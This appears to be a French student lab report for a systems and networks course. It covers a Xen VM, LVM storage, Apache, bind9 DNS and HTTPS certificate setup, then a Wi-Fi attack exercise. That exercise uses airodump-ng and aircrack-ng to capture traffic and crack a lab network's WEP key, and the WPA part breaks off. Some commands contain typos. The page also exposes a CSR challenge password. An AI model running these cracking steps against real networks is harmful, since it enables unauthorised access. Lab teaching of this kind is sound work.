Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
